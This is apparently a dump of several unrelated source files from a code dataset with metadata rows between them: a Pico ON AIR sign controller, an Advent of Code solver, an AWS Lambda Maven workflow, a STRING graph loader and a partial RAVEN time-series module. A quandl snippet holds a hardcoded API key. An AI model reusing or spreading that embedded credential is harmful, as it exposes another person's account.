def get_db() -> Session:
db = SessionLocal()
try:
yield db
finally:
db.close()
| 30.380952 | 103 | 0.775862 |
9e53f3460dfa9f06fe1c61688c39f68749388d52
| 11,126 |
py
|
Python
|
code_controller.py
|
aerialist/on_air_sign
|
022e351184c86ee24b81105439e6e43025c75f87
|
[
"MIT"
] | null | null | null |
code_controller.py
|
aerialist/on_air_sign
|
022e351184c86ee24b81105439e6e43025c75f87
|
[
"MIT"
] | 2 |
2021-08-10T07:39:00.000Z
|
2021-08-10T13:04:02.000Z
|
code_controller.py
|
aerialist/on_air_sign
|
022e351184c86ee24b81105439e6e43025c75f87
|
[
"MIT"
] | null | null | null |
def reference():
pass
# Raspberry Pi Pico RP2040
#dir(board)
#['__class__', 'A0', 'A1', 'A2', 'A3', 'GP0', 'GP1', 'GP10', 'GP11', 'GP12', 'GP13',
#'GP14', 'GP15', 'GP16', 'GP17', 'GP18', 'GP19', 'GP2', 'GP20', 'GP21', 'GP22', 'GP23',
#'GP24', 'GP25', 'GP26', 'GP26_A0', 'GP27', 'GP27_A1', 'GP28', 'GP28_A2', 'GP3', 'GP4',
#'GP5', 'GP6', 'GP7', 'GP8', 'GP9', 'LED', 'SMPS_MODE', 'VBUS_SENSE', 'VOLTAGE_MONITOR']
# ON_AIR_controller v1.0
# GP12: red button
# GP13: white button
# GP17: Rotary Encoder A
# GP16: Rotary Encoder B
# GP15: Rotary Encoder LED Red
# GP14: Rotary Encoder LED Green
# GP18: Rotary Encoder LED Blue
# GP19: Rotary Encoder Switch
# GP2: AirLift SCK
# GP3: AIrLift MOSI
# GP4: AirLift MISO
# GP5: AirLift CS
# GP6: AirLift BUSY
# GP7: AirLift !RST
# GP8: neopixel
# GP10: SDA
# GP11: SCL
# I2C SSD1306 OLED 128x64 display address 0x3c
#>>> help("modules")
#__main__ board microcontroller storage
#_bleio builtins micropython struct
#_eve busio msgpack supervisor
#_pixelbuf collections neopixel_write sys
#adafruit_bus_device countio os terminalio
#analogio digitalio pulseio time
#array displayio pwmio touchio
#audiobusio errno random ulab
#audiocore fontio re usb_hid
#audiomp3 framebufferio rgbmatrix usb_midi
#audiopwmio gamepad rotaryio vectorio
#binascii gc rp2pio watchdog
#bitbangio io rtc
#bitmaptools json sdcardio
#bitops math sharpdisplay
#Plus any modules on the filesystem
import board
import time
import rtc
import digitalio
from digitalio import DigitalInOut
from adafruit_debouncer import Debouncer
import rotaryio
import busio
from adafruit_datetime import datetime, timedelta
import displayio
import adafruit_displayio_ssd1306
import terminalio
from adafruit_display_text.label import Label
from adafruit_display_shapes.rect import Rect
from adafruit_display_shapes.line import Line
import neopixel
from adafruit_esp32spi import adafruit_esp32spi
from adafruit_esp32spi import adafruit_esp32spi_wifimanager
import adafruit_esp32spi.adafruit_esp32spi_socket as socket
#import adafruit_requests as requests
import adafruit_minimqtt.adafruit_minimqtt as MQTT
from adafruit_io.adafruit_io import IO_MQTT
from secrets import secrets
# OLED Display
WIDTH = 128
HEIGHT = 64
BORDER = 5
BLACK = 0x000000
WHITE = 0xFFFFFF
FEED_ONAIR = "matrix-onair"
FEED_TEXT = "matrix-text"
tz_offset=9 * 60 * 60 # Time zone offset from UTC in seconds
print("ONAIR display controller")
led = digitalio.DigitalInOut(board.LED)
led.direction = digitalio.Direction.OUTPUT
# Rotary Encoder
encoder = rotaryio.IncrementalEncoder(board.GP16, board.GP17)
led_red = digitalio.DigitalInOut(board.GP15)
led_red.direction = digitalio.Direction.OUTPUT
led_red.value = True # OFF
led_green = digitalio.DigitalInOut(board.GP14)
led_green.direction = digitalio.Direction.OUTPUT
led_green.value = True # OFF
led_blue = digitalio.DigitalInOut(board.GP18)
led_blue.direction = digitalio.Direction.OUTPUT
led_blue.value = True # OFF
btnRotaryPin = digitalio.DigitalInOut(board.GP19)
btnRotaryPin.direction = digitalio.Direction.INPUT
btnRotaryPin.pull = digitalio.Pull.UP
#btnRotary = Debouncer(btnRotaryPin, interval=0.1)
btnRotary = Debouncer(btnRotaryPin)
btnRedPin = digitalio.DigitalInOut(board.GP12)
btnRedPin.direction = digitalio.Direction.INPUT
btnRedPin.pull = digitalio.Pull.UP
btnRed = Debouncer(btnRedPin)
btnWhitePin = digitalio.DigitalInOut(board.GP13)
btnWhitePin.direction = digitalio.Direction.INPUT
btnWhitePin.pull = digitalio.Pull.UP
btnWhite = Debouncer(btnWhitePin)
displayio.release_displays()
i2c = busio.I2C(board.GP11, board.GP10)
display_bus = displayio.I2CDisplay(i2c, device_address=0x3c)
display = adafruit_displayio_ssd1306.SSD1306(display_bus, width=WIDTH, height=HEIGHT)
splash = displayio.Group(max_size=10)
group_on = displayio.Group()
splash.append(group_on)
group_on.hidden = True
group_off = displayio.Group()
splash.append(group_off)
group_status = displayio.Group()
group_status.x = WIDTH-6
group_status.y = HEIGHT-2
splash.append(group_status)
rect_on = Rect(0, 0, WIDTH, HEIGHT//2, fill=WHITE)
group_on.append(rect_on)
label_onair = Label(terminalio.FONT, text="ON AIR", color=BLACK)
label_onair.scale=2
label_onair.anchor_point = (0.5, 0.5)
label_onair.anchored_position = (WIDTH//2, HEIGHT//4)
group_on.append(label_onair)
rect_off = Rect(0, 0, WIDTH, HEIGHT//2, fill=BLACK)
group_off.append(rect_off)
label_off = Label(terminalio.FONT, text="GOOD", color=WHITE)
label_off.scale=2
label_off.anchor_point = (0.5, 0.5)
label_off.anchored_position = (WIDTH//2, HEIGHT//4)
group_off.append(label_off)
label_time = Label(terminalio.FONT, text="13:30", color=WHITE)
label_time.scale=2
label_time.anchor_point = (0.5, 0.5)
label_time.anchored_position = (WIDTH//4, 3*(HEIGHT//4))
splash.append(label_time)
label_time.text = ""
line_time = Line(2,HEIGHT-2, WIDTH//2-2, HEIGHT-2, color=WHITE)
splash.append(line_time)
label_time_feed = Label(terminalio.FONT, text="13:30", color=WHITE)
label_time_feed.scale=2
label_time_feed.anchor_point = (0.5, 0.5)
label_time_feed.anchored_position = (3*WIDTH//4, 3*(HEIGHT//4))
splash.append(label_time_feed)
label_time_feed.text = ""
rect_status = Rect(0,0,5,5,fill=WHITE)
group_status.append(rect_status)
def turn_on():
group_on.hidden = False
group_off.hidden = True
label_time.text = "13:30"
def turn_off():
group_on.hidden = True
group_off.hidden = False
label_time.text = ""
display.show(splash)
esp32_cs = DigitalInOut(board.GP5)
esp32_ready = DigitalInOut(board.GP6)
esp32_reset = DigitalInOut(board.GP7)
spi = busio.SPI(board.GP2, board.GP3, board.GP4)
esp = adafruit_esp32spi.ESP_SPIcontrol(spi, esp32_cs, esp32_ready, esp32_reset)
# esp._debug = True
status_light = neopixel.NeoPixel(board.GP8, 1, brightness=0.2)
wifi = adafruit_esp32spi_wifimanager.ESPSPI_WiFiManager(esp, secrets, status_light)
#requests.set_socket(socket, esp)
def connected(client):
# Connected function will be called when the client is connected to Adafruit IO.
print("Connected to Adafruit IO! ")
group_status.y -= 1
def subscribe(client, userdata, topic, granted_qos):
# This method is called when the client subscribes to a new feed.
print("Subscribed to {0} with QOS level {1}".format(topic, granted_qos))
def disconnected(client):
# Disconnected function will be called when the client disconnects.
print("Disconnected from Adafruit IO!")
def on_matrix_onair(client, topic, message):
# Method called whenever user/feeds/led has a new value
print("New message on topic {0}: {1} ".format(topic, message))
if message == "ON":
led.value = True
group_on.hidden = False
group_off.hidden = True
elif message == "OFF":
led.value = False
group_on.hidden = True
group_off.hidden = False
else:
print("Unexpected message on LED feed.")
def on_matrix_text(client, topic, message):
print("New message on topic {0}: {1} ".format(topic, message))
if message == ".":
label_time_feed.text = ""
else:
label_time_feed.text = message
def update_time_area_text(position):
dt = datetime.now() + timedelta(minutes=10*position) + timedelta(hours=1)
pp = "{:02d}:{:02d}".format(dt.hour, dt.minute//10*10)
#print(pp)
label_time.text = pp
# Connect to WiFi
print("Connecting to WiFi...")
wifi.connect()
print("Connected!")
group_status.y -= 1
# Get time from NTP server and set system time
while True:
# esp get_time fails in first few attemps
try:
now = esp.get_time()
except ValueError as e:
print(e)
time.sleep(1)
else:
break
print(now)
now = time.localtime(now[0] + tz_offset)
print(now)
rtc.RTC().datetime = now
group_status.y -= 1
# Initialize MQTT interface with the esp interface
MQTT.set_socket(socket, esp)
mqtt_client = MQTT.MQTT(
broker="io.adafruit.com",
username=secrets["aio_username"],
password=secrets["aio_password"],
)
io = IO_MQTT(mqtt_client)
io.on_connect = connected
io.on_disconnect = disconnected
io.on_subscribe = subscribe
io.add_feed_callback(FEED_ONAIR, on_matrix_onair)
io.add_feed_callback(FEED_TEXT, on_matrix_text)
print("Connecting to Adafruit IO...")
io.connect()
# Subscribe to all messages on the led feed
io.subscribe(FEED_ONAIR)
io.subscribe(FEED_TEXT)
def loop():
last_position = None
while True:
#print(time.monotonic())
btnRotary.update()
btnRed.update()
btnWhite.update()
position = encoder.position
if last_position is None or position != last_position:
update_time_area_text(position)
last_position = position
if btnRed.rose == True:
print("btnRed is pressed")
led_blue.value = False
led_green.value = True
encoder.position = 0
position = 0
last_position = 0
update_time_area_text(position)
io.publish(FEED_ONAIR, "ON")
print("Published!")
io.publish(FEED_TEXT, ".")
print("Published!")
if btnWhite.rose == True:
print("btnWhite is pressed")
led_blue.value = True
led_green.value = True
io.publish(FEED_ONAIR, "OFF")
print("Published!")
io.publish(FEED_TEXT, ".")
print("Published!")
if btnRotary.rose == True:
print("btnRotary is pressed")
#if group_on.hidden == False:
led_green.value = False
io.publish(FEED_TEXT, "~"+label_time.text)
print("Published!")
# Poll for incoming messages
try:
io.loop(0.1)
except (ValueError, RuntimeError, MQTT.MMQTTException) as e:
print("Failed to get data, retrying\n", e)
try:
wifi.reset()
wifi.connect()
io.reconnect()
#Failed to get data, retrying
# ESP32 timed out on SPI select
#Traceback (most recent call last):
# File "code.py", line 190, in <module>
# File "code.py", line 189, in <module>
# File "adafruit_io/adafruit_io.py", line 101, in reconnect
# File "adafruit_io/adafruit_io.py", line 101, in reconnect
#AdafruitIO_MQTTError: MQTT Error: Unable to reconnect to Adafruit IO.
except Exception as e:
print("Still network error... keep trying.")
print(e)
continue
loop()
| 33.014837 | 92 | 0.665558 |
741f53c230fa684a07e78aee1d3515b89005d4e8
| 254 |
py
|
Python
|
project/WeiboTest/Logger.py
|
zhengbomo/python_practice
|
1bc5c4ff426f806639bbc01249e66747271ec398
|
[
"MIT"
] | 2 |
2016-10-03T10:20:02.000Z
|
2018-03-20T00:38:53.000Z
|
project/WeiboTest/Logger.py
|
zhengbomo/python_practice
|
1bc5c4ff426f806639bbc01249e66747271ec398
|
[
"MIT"
] | 2 |
2019-10-08T07:13:44.000Z
|
2019-10-08T07:13:46.000Z
|
project/WeiboTest/Logger.py
|
zhengbomo/python_practice
|
1bc5c4ff426f806639bbc01249e66747271ec398
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python
# -*- coding:utf-8 -*-
class Logger(object):
@staticmethod
def info(type_, message):
pass
@staticmethod
def warning(type_, message):
pass
@staticmethod
def error(type_, message):
pass
| 14.941176 | 32 | 0.582677 |
a27c28a351371ddf09faf846671de43198a11bc5
| 4,428 |
py
|
Python
|
2016/11/11-python.py
|
allengarvin/adventofcode
|
004719c1721e514e3e8de8e94c25e0f858e96838
|
[
"BSD-3-Clause"
] | null | null | null |
2016/11/11-python.py
|
allengarvin/adventofcode
|
004719c1721e514e3e8de8e94c25e0f858e96838
|
[
"BSD-3-Clause"
] | null | null | null |
2016/11/11-python.py
|
allengarvin/adventofcode
|
004719c1721e514e3e8de8e94c25e0f858e96838
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/python
import sys, re, itertools
from operator import and_, or_, xor
def mysplit(s):
return re.split(", and | and |, ", s)
def main():
floors = [0,0,0,0]
things = []
for l in map(lambda x: x.strip(), open("../advent-2016/11-input.txt").readlines()):
fl, stuff = l.split(" contains ")
stuff = stuff.rstrip(".")
#print stuff
fl_num = { "The first floor" : 0, "The second floor" : 1, "The third floor" : 2, "The fourth floor": 3 }[fl]
floors[fl_num] = []
if stuff == "nothing relevant":
continue
for t in mysplit(stuff):
things.append(t)
floors[fl_num].append(t)
things = sorted(things)
def convert_to_binary(contents):
n = 0
for i, what in enumerate(things):
if what in contents:
n |= 1 << i
return n << 1
floors = map(convert_to_binary, floors)
floors[0] |= 1
def shorten(thing):
return "".join(map(lambda x: x[0].upper(), thing.split(" ")[1:]))
def display_floor(n):
s = "E " if n & 1 else ". "
for i, what in enumerate(things):
s += shorten(what) if ((2**i)<<1) & n else ". "
s += " "
return s
def display(fl):
s = ""
print fl
for fn in range(4, 0, -1):
s += "F" + str(fn) + " "
f = fl[fn-1]
s += "E " if f & 1 else ". "
for i, what in enumerate(things):
s += shorten(what) if ((2 ** i)<<1) & f else ". "
s += " "
s += "\n"
print s
def current_floor(floors_tmp):
for i, w in enumerate(floors_tmp):
if w & 1:
return i
print "NO ELEVATOR EXISTS. BUG. current_floor() call"
sys.exit(1)
def avail_to_move(floors_tmp):
fl = current_floor(floors_tmp)
items = []
for i, what in enumerate(things):
if floors_tmp[fl] & (1 << (i+1)):
items.append(1 << (i+1))
return map(lambda x: x[0] | x[1], itertools.combinations(items, 2)) + items
def adjacent_floors(floors_tmp):
fl = current_floor(floors_tmp)
if fl == 0:
return [1]
elif fl == 3:
return [2]
else:
return [fl-1, fl+1]
def test_valid(fl, new):
proposed_floor = fl | new
generators = set([])
chips = set([])
for i, x in enumerate(things):
if proposed_floor & (1 << (i+1)):
if "generator" in x:
generators.add(x.split()[1])
else:
chips.add(x.split()[1].split("-")[0])
if len(generators - chips) and len(chips - generators):
#print "Inval: ", display_floor(proposed_floor)
return False
else:
#print "Valid: ", display_floor(proposed_floor)
return True
steps = { 0 : set( [tuple(floors) ] ) }
#steps = { 0 : set( [(16, 7, 8, 0) ] ) }
#steps = { 0 : set( [(21, 0, 10, 0)] ) }
step = 1
while True:
steps[step] = set()
print "====================", step, "=================="
for i in steps[step-1]:
fl = list(i)
for f in adjacent_floors(fl):
for m in avail_to_move(fl):
if test_valid(fl[f], m) and test_valid(fl[current_floor(fl)] ^ (m), 0):
new_fl = fl[:]
new_fl[current_floor(fl)] ^= (1 | m)
new_fl[f] |= (1 | m)
new_fl = tuple(new_fl)
for st in range(step):
if new_fl in steps[st]:
continue
if new_fl[3] == 2 ** (len(things) + 1) - 1:
display(new_fl)
print "WE WON", step
sys.exit(1)
steps[step].add(new_fl)
#display(new_fl)
#print steps
step += 1
#print step
# Answer 2 is easy. Some experimentation found every extra two items on floor add 12 steps. I could optimize this
# but this problem has annoyed me long enough.
if __name__ == "__main__":
main()
| 29.52 | 116 | 0.448961 |
7454d59253416b1e4146fc587311759e15eaaec6
| 281 |
py
|
Python
|
sentdex_data_analysis/pandas_building_dataset.py
|
yull1860outlook/Data-Analysis
|
b777d9a75eb1acc4c899946d547e5585469a83ae
|
[
"MIT"
] | 4,358 |
2017-12-29T17:56:07.000Z
|
2022-03-30T15:14:57.000Z
|
sentdex_data_analysis/pandas_building_dataset.py
|
MarwanAmr509/Data-Analysis
|
34a48f16f6be757ed3f35cb3fc458569023c9bd8
|
[
"MIT"
] | 61 |
2018-01-18T17:50:46.000Z
|
2022-03-09T20:16:01.000Z
|
sentdex_data_analysis/pandas_building_dataset.py
|
MarwanAmr509/Data-Analysis
|
34a48f16f6be757ed3f35cb3fc458569023c9bd8
|
[
"MIT"
] | 3,689 |
2017-12-29T17:57:36.000Z
|
2022-03-29T12:26:03.000Z
|
import quandl
import pandas as pd
api_key = "rFsSehe51RLzREtYhLfo"
# df = quandl.get('FMAC/HPI_AK', authtoken = api_key)
fifty_states = pd.read_html("https://simple.wikipedia.org/wiki/List_of_U.S._states")
for abbv in fifty_states[0][0][1:]:
print("FMAC/HPI_" + str(abbv))
| 23.416667 | 84 | 0.72242 |
36d6dbb1cf9fa3df911ae1417ed5774b8b6b8c6b
| 2,324 |
py
|
Python
|
aws_lambda_builders/workflows/java_maven/workflow.py
|
eldritchideen/aws-lambda-builders
|
8bd869d9c2b83f67b4f37d45883f9436e1cb1179
|
[
"Apache-2.0"
] | 88 |
2020-09-03T18:51:44.000Z
|
2022-03-22T23:46:14.000Z
|
aws_lambda_builders/workflows/java_maven/workflow.py
|
eldritchideen/aws-lambda-builders
|
8bd869d9c2b83f67b4f37d45883f9436e1cb1179
|
[
"Apache-2.0"
] | 88 |
2020-09-01T19:22:28.000Z
|
2022-03-30T01:55:36.000Z
|
aws_lambda_builders/workflows/java_maven/workflow.py
|
eldritchideen/aws-lambda-builders
|
8bd869d9c2b83f67b4f37d45883f9436e1cb1179
|
[
"Apache-2.0"
] | 40 |
2020-09-02T17:29:39.000Z
|
2022-03-31T02:36:17.000Z
|
"""
Java Maven Workflow
"""
from aws_lambda_builders.workflow import BaseWorkflow, Capability
from aws_lambda_builders.actions import CopySourceAction, CleanUpAction
from aws_lambda_builders.workflows.java.actions import JavaCopyDependenciesAction, JavaMoveDependenciesAction
from aws_lambda_builders.workflows.java.utils import OSUtils
from .actions import JavaMavenBuildAction, JavaMavenCopyDependencyAction, JavaMavenCopyArtifactsAction
from .maven import SubprocessMaven
from .maven_resolver import MavenResolver
from .maven_validator import MavenValidator
class JavaMavenWorkflow(BaseWorkflow):
"""
A Lambda builder workflow that knows how to build Java projects using Maven.
"""
NAME = "JavaMavenWorkflow"
CAPABILITY = Capability(language="java", dependency_manager="maven", application_framework=None)
EXCLUDED_FILES = (".aws-sam", ".git")
def __init__(self, source_dir, artifacts_dir, scratch_dir, manifest_path, **kwargs):
super(JavaMavenWorkflow, self).__init__(source_dir, artifacts_dir, scratch_dir, manifest_path, **kwargs)
self.os_utils = OSUtils()
# Assuming root_dir is the same as source_dir for now
root_dir = source_dir
subprocess_maven = SubprocessMaven(maven_binary=self.binaries["mvn"], os_utils=self.os_utils)
self.actions = [
CopySourceAction(root_dir, scratch_dir, excludes=self.EXCLUDED_FILES),
JavaMavenBuildAction(scratch_dir, subprocess_maven),
JavaMavenCopyDependencyAction(scratch_dir, subprocess_maven),
JavaMavenCopyArtifactsAction(scratch_dir, artifacts_dir, self.os_utils),
]
if self.dependencies_dir:
# clean up the dependencies first
self.actions.append(CleanUpAction(self.dependencies_dir))
if self.combine_dependencies:
self.actions.append(JavaCopyDependenciesAction(artifacts_dir, self.dependencies_dir, self.os_utils))
else:
self.actions.append(JavaMoveDependenciesAction(artifacts_dir, self.dependencies_dir, self.os_utils))
def get_resolvers(self):
return [MavenResolver(executable_search_paths=self.executable_search_paths)]
def get_validators(self):
return [MavenValidator(self.runtime, self.architecture, self.os_utils)]
| 42.254545 | 116 | 0.75 |
6bd99c6eba0ca874b896c3c335b28ec78111e901
| 172 |
py
|
Python
|
v1/items/urls.py
|
DucPhamTV/MaiTet
|
44a1465a3239808f6640592ba666d9c5449c0ef4
|
[
"MIT"
] | null | null | null |
v1/items/urls.py
|
DucPhamTV/MaiTet
|
44a1465a3239808f6640592ba666d9c5449c0ef4
|
[
"MIT"
] | 15 |
2021-02-20T12:03:33.000Z
|
2021-07-26T10:15:03.000Z
|
v1/items/urls.py
|
DucPhamTV/MaiTet
|
44a1465a3239808f6640592ba666d9c5449c0ef4
|
[
"MIT"
] | null | null | null |
from rest_framework.routers import SimpleRouter
from v1.items.views import ItemViewSet
router = SimpleRouter(trailing_slash=False)
router.register('items', ItemViewSet)
| 21.5 | 47 | 0.831395 |
440b188398b16e3b21a45a5676f2f967ada33693
| 6,778 |
py
|
Python
|
bindings/python/ensmallen_graph/datasets/string/comamonasaquatica.py
|
caufieldjh/ensmallen_graph
|
14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a
|
[
"MIT"
] | null | null | null |
bindings/python/ensmallen_graph/datasets/string/comamonasaquatica.py
|
caufieldjh/ensmallen_graph
|
14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a
|
[
"MIT"
] | null | null | null |
bindings/python/ensmallen_graph/datasets/string/comamonasaquatica.py
|
caufieldjh/ensmallen_graph
|
14e98b1cdbc73193a84a913d7d4f2b2b3eb2c43a
|
[
"MIT"
] | null | null | null |
"""
This file offers the methods to automatically retrieve the graph Comamonas aquatica.
The graph is automatically retrieved from the STRING repository.
Report
---------------------
At the time of rendering these methods (please see datetime below), the graph
had the following characteristics:
Datetime: 2021-02-02 23:22:47.704643
The undirected graph Comamonas aquatica has 3197 nodes and 364326 weighted
edges, of which none are self-loops. The graph is dense as it has a density
of 0.07131 and has 5 connected components, where the component with most
nodes has 3181 nodes and the component with the least nodes has 2 nodes.
The graph median node degree is 193, the mean node degree is 227.92, and
the node degree mode is 5. The top 5 most central nodes are 1219031.BBJR01000069_gene1085
(degree 1347), 1219031.BBJR01000052_gene1535 (degree 1147), 1219031.BBJR01000036_gene3013
(degree 1129), 1219031.BBJR01000058_gene1943 (degree 1090) and 1219031.BBJR01000031_gene298
(degree 1067).
References
---------------------
Please cite the following if you use the data:
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
Usage example
----------------------
The usage of this graph is relatively straightforward:
.. code:: python
# First import the function to retrieve the graph from the datasets
from ensmallen_graph.datasets.string import ComamonasAquatica
# Then load the graph
graph = ComamonasAquatica()
# Finally, you can do anything with it, for instance, compute its report:
print(graph)
# If you need to run a link prediction task with validation,
# you can split the graph using a connected holdout as follows:
train_graph, validation_graph = graph.connected_holdout(
# You can use an 80/20 split the holdout, for example.
train_size=0.8,
# The random state is used to reproduce the holdout.
random_state=42,
# Wether to show a loading bar.
verbose=True
)
# Remember that, if you need, you can enable the memory-time trade-offs:
train_graph.enable(
vector_sources=True,
vector_destinations=True,
vector_outbounds=True
)
# Consider using the methods made available in the Embiggen package
# to run graph embedding or link prediction tasks.
"""
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen_graph import EnsmallenGraph # pylint: disable=import-error
def ComamonasAquatica(
directed: bool = False,
verbose: int = 2,
cache_path: str = "graphs/string",
**additional_graph_kwargs: Dict
) -> EnsmallenGraph:
"""Return new instance of the Comamonas aquatica graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False,
Wether to load the graph as directed or undirected.
By default false.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache_path: str = "graphs",
Where to store the downloaded graphs.
additional_graph_kwargs: Dict,
Additional graph kwargs.
Returns
-----------------------
Instace of Comamonas aquatica graph.
Report
---------------------
At the time of rendering these methods (please see datetime below), the graph
had the following characteristics:
Datetime: 2021-02-02 23:22:47.704643
The undirected graph Comamonas aquatica has 3197 nodes and 364326 weighted
edges, of which none are self-loops. The graph is dense as it has a density
of 0.07131 and has 5 connected components, where the component with most
nodes has 3181 nodes and the component with the least nodes has 2 nodes.
The graph median node degree is 193, the mean node degree is 227.92, and
the node degree mode is 5. The top 5 most central nodes are 1219031.BBJR01000069_gene1085
(degree 1347), 1219031.BBJR01000052_gene1535 (degree 1147), 1219031.BBJR01000036_gene3013
(degree 1129), 1219031.BBJR01000058_gene1943 (degree 1090) and 1219031.BBJR01000031_gene298
(degree 1067).
References
---------------------
Please cite the following if you use the data:
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
Usage example
----------------------
The usage of this graph is relatively straightforward:
.. code:: python
# First import the function to retrieve the graph from the datasets
from ensmallen_graph.datasets.string import ComamonasAquatica
# Then load the graph
graph = ComamonasAquatica()
# Finally, you can do anything with it, for instance, compute its report:
print(graph)
# If you need to run a link prediction task with validation,
# you can split the graph using a connected holdout as follows:
train_graph, validation_graph = graph.connected_holdout(
# You can use an 80/20 split the holdout, for example.
train_size=0.8,
# The random state is used to reproduce the holdout.
random_state=42,
# Wether to show a loading bar.
verbose=True
)
# Remember that, if you need, you can enable the memory-time trade-offs:
train_graph.enable(
vector_sources=True,
vector_destinations=True,
vector_outbounds=True
)
# Consider using the methods made available in the Embiggen package
# to run graph embedding or link prediction tasks.
"""
return AutomaticallyRetrievedGraph(
graph_name="ComamonasAquatica",
dataset="string",
directed=directed,
verbose=verbose,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| 35.486911 | 223 | 0.707583 |
7656bd9c717655f42843f8e616fc8b4ef4f25325
| 8,781 |
py
|
Python
|
framework/TSA/RWD.py
|
yenili/raven
|
cc5f10e387d40219213beff05a3f72e9386034d5
|
[
"Apache-2.0"
] | 1 |
2021-07-12T19:41:52.000Z
|
2021-07-12T19:41:52.000Z
|
framework/TSA/RWD.py
|
yenili/raven
|
cc5f10e387d40219213beff05a3f72e9386034d5
|
[
"Apache-2.0"
] | null | null | null |
framework/TSA/RWD.py
|
yenili/raven
|
cc5f10e387d40219213beff05a3f72e9386034d5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2017 Battelle Energy Alliance, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Randomized Window Decomposition
"""
import collections
import numpy as np
import scipy as sp
import Decorators
import string
import numpy.linalg as LA
import pandas as pd
import copy as cp
from utils import InputData, InputTypes, randomUtils, xmlUtils, mathUtils, importerUtils
statsmodels = importerUtils.importModuleLazy('statsmodels', globals())
import Distributions
from .TimeSeriesAnalyzer import TimeSeriesGenerator, TimeSeriesCharacterizer
randomUtils.randomSeed(42, engine=None, seedBoth=False)
# utility methods
class RWD(TimeSeriesCharacterizer):
r"""
Randomized Window Decomposition
"""
@classmethod
def getInputSpecification(cls):
"""
Method to get a reference to a class that specifies the input data for
class cls.
@ Out, inputSpecification, InputData.ParameterInput, class to use for
specifying input of cls.
"""
specs = super(RWD, cls).getInputSpecification()
specs.name = 'rwd'
specs.description = r"""TimeSeriesAnalysis algorithm for sliding window snapshots to generate features"""
specs.addSub(InputData.parameterInputFactory('signatureWindowLength', contentType=InputTypes.IntegerType,
descr=r"""the size of signature window, which represents as a snapshot for a certain time step;
typically represented as $w$ in literature, or $w_sig$ in the code."""))
specs.addSub(InputData.parameterInputFactory('featureIndex', contentType=InputTypes.IntegerType,
descr=r""" Index used for feature selection, which requires pre-analysis for now, will be addresses
via other non human work required method """))
specs.addSub(InputData.parameterInputFactory('sampleType', contentType=InputTypes.IntegerType,
descr=r"""Indicating the type of sampling."""))
return specs
#
# API Methods
#
def __init__(self, *args, **kwargs):
"""
A constructor that will appropriately intialize a supervised learning object
@ In, args, list, an arbitrary list of positional values
@ In, kwargs, dict, an arbitrary dictionary of keywords and values
@ Out, None
"""
# general infrastructure
super().__init__(*args, **kwargs)
self._minBins = 20 # this feels arbitrary; used for empirical distr. of data
def handleInput(self, spec):
"""
Reads user inputs into this object.
@ In, inp, InputData.InputParams, input specifsications
@ In, sampleType, integer = 0, 1, 2
@ sampleType = 0: Sequentially Sampling
@ sampleType = 1: Randomly Sampling
@ sampleType = 2: Piecewise Sampling
@ Out, settings, dict, initialization settings for this algorithm
"""
settings = super().handleInput(spec)
settings['signatureWindowLength'] = spec.findFirst('signatureWindowLength').value
settings['featureIndex'] = spec.findFirst('featureIndex').value
settings['sampleType'] = spec.findFirst('sampleType').value
return settings
def setDefaults(self, settings):
"""
Fills default values for settings with default values.
@ In, settings, dict, existing settings
@ Out, settings, dict, modified settings
"""
settings = super().setDefaults(settings)
if 'signatureWindowLength' not in settings:
settings['signatureWindowLength'] = None
settings['sampleType'] = 1
return settings ####
def characterize(self, signal, pivot, targets, settings):
"""
Determines the charactistics of the signal based on this algorithm.
@ In, signal, np.ndarray, time series with dims [time, target]
@ In, pivot, np.1darray, time-like parameter values
@ In, targets, list(str), names of targets in same order as signal
@ In, settings, dict, settings for this ROM
@ Out, params, dict of dict: 1st level contains targets/variables; 2nd contains: U vectors and features
"""
# lazy import statsmodels
import statsmodels.api
# settings:
# signatureWindowLength, int, Signature window length
# featureIndex, list of int, The index that contains differentiable params
params = {}
for tg, target in enumerate(targets):
history = signal[:, tg]
if settings['signatureWindowLength'] is None:
settings['signatureWindowLength'] = len(history)//10
signatureWindowLength = int(settings['signatureWindowLength'])
fi = int(settings['featureIndex'])
sampleType = settings['sampleType']
allWindowNumber = int(len(history)-signatureWindowLength+1)
signatureMatrix = np.zeros((signatureWindowLength, allWindowNumber))
for i in range(allWindowNumber):
signatureMatrix[:,i] = np.copy(history[i:i+signatureWindowLength])
# Sequential sampling
if sampleType == 0:
baseMatrix = np.copy(signatureMatrix)
# Randomized sampling
elif sampleType == 1:
sampleLimit = len(history)-signatureWindowLength
windowNumber = sampleLimit//4
baseMatrix = np.zeros((signatureWindowLength, windowNumber))
for i in range(windowNumber):
windowIndex = randomIntegers(0, sampleLimit, caller=None, engine=None)
baseMatrix[:,i] = np.copy(history[windowIndex:windowIndex+signatureWindowLength])
# Piecewise Sampling
else:
windowNumber = len(history)//signatureWindowLength
baseMatrix = np.zeros((signatureWindowLength, windowNumber))
